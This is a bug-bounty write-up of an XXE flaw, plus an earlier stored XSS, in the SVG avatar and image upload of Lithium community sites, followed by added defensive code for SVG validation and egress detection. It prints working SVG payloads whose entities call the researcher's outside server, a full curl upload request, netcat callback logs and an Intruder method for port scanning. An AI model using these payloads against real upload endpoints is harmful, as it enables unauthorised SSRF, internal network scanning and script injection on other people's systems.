XXE in Lithium Community Platform

Severity: P1 (critical)

Application: community.[company].com

Vendor: Lithium Technology

Award: $4000 in total, from different clients

The Lithium community platform, used by 400+ clients including PayPal, HP, AT&T and many more, has a function on community.[company].com to upload avatars and images. It accepted SVG (XML) files. When an SVG file was uploaded, the server-side XML parser parsed it, including its DTD, which caused XXE with severe consequences. The XXE allowed an attacker to scan internal ports and remote server ports, upload a DTD file, cause an FTP DoS, and more.

How did I find this vulnerability?

One day I was working on Bugcrowd, hunting for bugs on one of Lithium's clients' sites. I found that the site's avatar upload functionality accepted SVG files, so I uploaded an SVG file containing XSS code. The upload succeeded and returned a link, which was a stored XSS link.

CODE:–

<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><script type="text/javascript"> prompt('paswword please!');</script></svg>

I reported it to Bugcrowd. Ten days after reporting this bug, I realised that uploading an SVG file could also cause XXE if the server parsed it. So I uploaded an out-of-band (OOB) XXE payload and found a more severe vulnerability than the XSS: XXE.

Below are the things I was able to prove.

1) Proved OOB XXE: the server made a request to my server vps0007.dasaweb.co.uk

2) Proved SSRF and an internal port scan

3) Proved FTP DoS, as an FTP connection was made to my server vps0007.dasaweb.co.uk

4) Information disclosure in the User-Agent header

5) There are many other things, such as script execution, which I have not proved.
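The root cause behind both findings above is the same: the upload handler hands a user-supplied SVG to a full XML parser that honours its DTD, and later serves the file back with its script content intact. The following is an added example, written for this page and not code from the original post or from Lithium, of an upload pre-check that removes both problems at the parsing stage. It uses Python's standard expat bindings configured to fail fast: any DOCTYPE, entity declaration, external entity reference or processing instruction aborts the parse before anything could be resolved, and the element walk refuses the <script> and <foreignObject> elements, on* event attributes and javascript: hrefs that carry stored XSS. It goes slightly beyond the two payloads in the write-up by covering those extra XSS vectors. The three sample SVGs are constructed for the example, and xxe-collector.example is a placeholder hostname.

```python
import xml.parsers.expat

# Constructed sample uploads for this example. The first two mirror the two
# payload shapes in the write-up (an external entity fetched from an attacker
# host, and an inline <script>); the third is a harmless icon. The hostname
# xxe-collector.example is a placeholder, not a real collector.
XXE_SVG = (b'<?xml version="1.0"?><!DOCTYPE r [ <!ELEMENT r ANY >'
           b'<!ENTITY sp SYSTEM "http://xxe-collector.example:9001/data.xml"> ]>'
           b'<r>&sp;</r>')
XSS_SVG = (b'<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg">'
           b'<polygon points="0,0 0,50 50,0" fill="#009900"/>'
           b'<script type="text/javascript">prompt(1)</script></svg>')
BENIGN_SVG = (b'<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg" '
              b'width="50" height="50"><polygon points="0,0 0,50 50,0" fill="#009900"/></svg>')

# Elements that let an SVG run script or embed arbitrary HTML
# (compared by lower-cased local name, so svg:script is caught too).
FORBIDDEN_ELEMENTS = {"script", "foreignobject"}


class RejectedSvg(Exception):
    """Raised from a parser callback the moment a forbidden construct appears."""


def _local(qname):
    """'xlink:href' -> 'href', 'svg:script' -> 'script'."""
    return qname.rsplit(":", 1)[-1].lower()


def validate_svg(data, max_bytes=512 * 1024):
    """Return (accepted, reason) for an uploaded SVG given as bytes.

    A renderable SVG needs no DOCTYPE, no entities and no processing
    instructions, so rejecting them costs nothing and removes the XXE
    surface entirely; the parser is aborted before expat could resolve
    anything. Script-bearing elements and attributes are refused as well.
    """
    if len(data) > max_bytes:
        return False, "file too large"

    parser = xml.parsers.expat.ParserCreate()
    state = {"root": None}

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise RejectedSvg("DOCTYPE declaration not allowed")

    def on_entity_decl(*_args):
        raise RejectedSvg("entity declaration not allowed")

    def on_external_entity(context, base, sysid, pubid):
        raise RejectedSvg("external entity reference not allowed")

    def on_pi(target, _data):
        raise RejectedSvg("processing instruction <?%s?> not allowed" % target)

    def on_start(name, attrs):
        local = _local(name)
        if state["root"] is None:
            state["root"] = local
        if local in FORBIDDEN_ELEMENTS:
            raise RejectedSvg("element <%s> not allowed" % name)
        for attr, value in attrs.items():
            if _local(attr).startswith("on"):
                raise RejectedSvg("event handler attribute %s not allowed" % attr)
            if _local(attr) == "href" and value.strip().lower().startswith("javascript:"):
                raise RejectedSvg("javascript: URL in %s not allowed" % attr)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_entity
    parser.ProcessingInstructionHandler = on_pi
    parser.StartElementHandler = on_start

    try:
        parser.Parse(data, True)
    except RejectedSvg as exc:
        return False, str(exc)
    except xml.parsers.expat.ExpatError as exc:
        return False, "not well-formed XML: %s" % exc

    if state["root"] != "svg":
        return False, "root element is <%s>, expected <svg>" % state["root"]
    return True, "ok"


if __name__ == "__main__":
    for label, blob in (("xxe", XXE_SVG), ("xss", XSS_SVG), ("benign", BENIGN_SVG)):
        print(label, validate_svg(blob))
```

The check is deliberately a reject-list on parser events rather than a regex over the bytes, because the parser sees the document the same way the real XML library would (encoding, comments and CDATA included), and a DOCTYPE refusal in the callback fires before any DTD processing. Whatever store accepts the file afterwards should also serve it with a Content-Disposition of attachment or from a separate origin so that a future bypass cannot become stored XSS on the main domain.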

STEP BY STEP POC:–

1) Log in to community.[company].com and go to either https://community.[company].com/t5/media/gallerypage/user-id/User-ID or https://community.[company].com/t5/user/myprofilepage/tab/user-icons

The image upload option is https://community.[company].com/t5/media/gallerypage/user-id/User-ID

The avatar upload option is https://community.[company].com/t5/user/myprofilepage/tab/user-icons

2) I had an SVG file with the XML code below embedded:

<?xml version="1.0" ?><!DOCTYPE r [ <!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://vps0007.dasaweb.co.uk:9001/data.xml">
]><r>&sp;</r>

3) Upload the SVG file with the embedded XML through the browser, using either the add image or the avatar upload option.

3a) The request will look like this:

curl -i -s -k -X $'POST' \
   -H $'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0' -H $'X-Requested-With: XMLHttpRequest' -H $'Referer: https://community.[company].com/t5/user/myprofilepage/tab/user-icons' -H $'Content-Type: multipart/form-data; boundary=---------------------------39612053628921' \
   -b $'REMOVED' \
   --data-binary $'-----------------------------39612053628921\x0d\x0aContent-Disposition: form-data; name=\"anonAction\"\x0d\x0a\x0d\x0atrue\x0d\x0a-----------------------------39612053628921\x0d\x0aContent-Disposition: form-data; name=\"t:ac\"\x0d\x0a\x0d\x0atab/user-icons\x0d\x0a-----------------------------39612053628921\x0d\x0aContent-Disposition: form-data; name=\"t:cp\"\x0d\x0a\x0d\x0ablock/propertyeditblocks\x0d\x0a-----------------------------39612053628921\x0d\x0aContent-Disposition: form-data; name=\"Filename\"\x0d\x0a\x0d\x0axxe_svg.svg\x0d\x0a-----------------------------39612053628921\x0d\x0aContent-Disposition: form-data; name=\"Filesize\"\x0d\x0a\x0d\x0a251\x0d\x0a-----------------------------39612053628921\x0d\x0aContent-Disposition: form-data; name=\"Filedata\"; filename=\"xxe_svg.svg\"\x0d\x0aContent-Type: image/svg+xml\x0d\x0a\x0d\x0a<?xml version=\"1.0\" standalone=\"yes\"?><!DOCTYPE ernw [ <!ENTITY xxe SYSTEM \"FTP:// vps0007.dasaweb.co.uk:\xa79001\xa7\" > ]><svg width=\"500px\" height=\"40px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\">&xxe;</svg>\x0d\x0a-----------------------------39612053628921\x14\x0d\x0a' \
   $'https://community.company.com/t5/user/myprofilepage.imageuploadeditor:uploadimage?t:ac=tab/user-icons&t:cp=block/propertyeditblocks'

4) Now I saw the request on my server, where netcat was listening:

listening on [37.59.68.106] 9001 ...
connect to [37.59.68.106] from xxx.lithium.com [46.19.168.9] 56830
GET /data.xml HTTP/1.1
User-Agent: Java/1.8.0_66
Host: vps0007.dasaweb.co.uk:9001
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

5) Now change the XML code in the SVG file to use FTP:

<?xml version="1.0" ?><!DOCTYPE r [ <!ELEMENT r ANY >
<!ENTITY sp SYSTEM "FTP://vps0007.dasaweb.co.uk:9001/data.xml">
]>
<r>&sp;</r>

6) Upload it and check the request on my server, where netcat is listening, coming from ams1-nat.lithium.com:

listening on [37.59.68.106] 9001 ...
connect to [37.59.68.106] from xxx.lithium.com [46.19.168.9] 55535

7) Now intercept the SVG upload request in Burp and send it to Intruder.

8) Now fuzz the port (here it is 9001): FTP:// vps0007.dasaweb.co.uk:§9001§

Fuzz it from 20 to 90 in Intruder, and remember to set the number of threads in Intruder to 1. My server has ports 80, 22 and 23 open.

Below you can see that ports 22, 23 and 80 show timeout timings, which means they are open. I did the same for internal IPs and was able to perform an internal port scan.

9) Look at the User-Agent: you can see the information leakage.

Connect to [37.59.68.106] from ams1-nat.lithium.com [46.19.168.9] 48550

GET / HTTP/1.1
User-Agent: Java/1.8.0_66
Host: vps0007.dasaweb.co.uk:9001
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
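The netcat output above is the attacker's view. The same activity is visible from the defender's side as outbound connections from the application tier, carrying a Java/1.8.0_66 User-Agent, to hosts it has no business reaching, and, during the Intruder run, as a burst of connection attempts to consecutive ports on one destination. The following is an added example (not from the original post or from Lithium) of detection logic for both patterns over an egress log: it flags any upload-parsing host that contacts a destination outside its dependency allowlist, and any host that tries a threshold number of distinct ports on one destination inside a time window. The log lines, addresses and allowlist are constructed for the example; only the User-Agent string is taken from the write-up.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed forward-proxy / egress log for this example: one outbound
# connection attempt per line. Addresses and timestamps are made up; only the
# User-Agent string mirrors the one the write-up observed.
EGRESS_LOG = """\
2017-01-10T10:00:01Z src=10.0.5.21 dst=52.1.1.10 dport=443 ua="Java/1.8.0_66" result=allowed
2017-01-10T10:00:02Z src=10.0.5.22 dst=52.1.1.10 dport=443 ua="Java/1.8.0_66" result=allowed
2017-01-10T10:00:05Z src=10.0.5.21 dst=203.0.113.7 dport=9001 ua="Java/1.8.0_66" result=allowed
2017-01-10T10:00:06Z src=10.0.5.21 dst=203.0.113.7 dport=20 ua="Java/1.8.0_66" result=refused
2017-01-10T10:00:07Z src=10.0.5.21 dst=203.0.113.7 dport=21 ua="Java/1.8.0_66" result=refused
2017-01-10T10:00:08Z src=10.0.5.21 dst=203.0.113.7 dport=22 ua="Java/1.8.0_66" result=timeout
2017-01-10T10:00:09Z src=10.0.5.21 dst=203.0.113.7 dport=23 ua="Java/1.8.0_66" result=timeout
2017-01-10T10:00:10Z src=10.0.5.21 dst=203.0.113.7 dport=25 ua="Java/1.8.0_66" result=refused
2017-01-10T10:00:11Z src=10.0.5.21 dst=203.0.113.7 dport=80 ua="Java/1.8.0_66" result=timeout
2017-01-10T10:00:30Z src=10.0.5.21 dst=10.0.0.5 dport=22 ua="Java/1.8.0_66" result=timeout
2017-01-10T10:00:31Z src=10.0.5.21 dst=10.0.0.5 dport=80 ua="Java/1.8.0_66" result=allowed
2017-01-10T10:00:32Z src=10.0.5.21 dst=10.0.0.5 dport=443 ua="Java/1.8.0_66" result=refused
garbage line the parser must skip
"""

APP_TIER = {"10.0.5.21", "10.0.5.22"}   # hosts that parse user uploads (constructed)
ALLOWED_DSTS = {"52.1.1.10"}             # their only legitimate dependency (constructed)

LINE_RE = re.compile(
    r'^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+) '
    r'ua="(?P<ua>[^"]*)" result=(?P<result>\w+)$')


def parse_line(line):
    """One log line -> dict, or None when the line does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
    ev["dport"] = int(ev["dport"])
    return ev


def find_xxe_egress(lines, app_tier, allowed_dsts,
                    scan_threshold=5, window=timedelta(seconds=60)):
    """Return alerts as (kind, src, dst, count) tuples, ordered by src/dst.

    unexpected_egress: an upload-parsing host reached a destination outside
                       its allowlist (the OOB callback seen in steps 4 and 6).
    port_scan:         one host tried scan_threshold or more distinct ports on
                       the same destination within `window` (the Intruder run).
    """
    by_pair = defaultdict(list)
    for ev in filter(None, map(parse_line, lines)):
        if ev["src"] in app_tier:
            by_pair[(ev["src"], ev["dst"])].append(ev)

    alerts = []
    for (src, dst), evs in sorted(by_pair.items(), key=lambda kv: kv[0]):
        if dst not in allowed_dsts:
            alerts.append(("unexpected_egress", src, dst, len(evs)))
        evs.sort(key=lambda ev: ev["ts"])
        # Sliding window: most distinct ports seen within `window` of any event.
        most_ports = 0
        for i, first in enumerate(evs):
            in_window = {ev["dport"] for ev in evs[i:] if ev["ts"] - first["ts"] <= window}
            most_ports = max(most_ports, len(in_window))
        if most_ports >= scan_threshold:
            alerts.append(("port_scan", src, dst, most_ports))
    return alerts


if __name__ == "__main__":
    for alert in find_xxe_egress(EGRESS_LOG.splitlines(), APP_TIER, ALLOWED_DSTS):
        print(*alert)
```

The allowlist rule is the one that matters most: an application server that parses uploads has a short, known list of things it should connect to, and the OOB callback in step 4 is a single connection that no volume threshold would catch. The port-scan rule covers the Intruder-style enumeration, where refused and timed-out attempts are as informative as successful ones, so the detector counts attempts rather than completed sessions. Enforcing the same allowlist at the proxy or firewall turns the detection into prevention.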


Rewards and recognition:–

Company           | Sites           | Award & Recognition
Bugcrowd          | Client          | $2000
ING Bank          | Many sites      | Awarded with cash
PayPal            | Community sites | $500
Ubiquiti Networks | Community       | $500
Many others       | Sites           | $1000


Published by

Vibhuti

Hey! I am a security researcher, tester and hacker. Finding bugs is my passion.
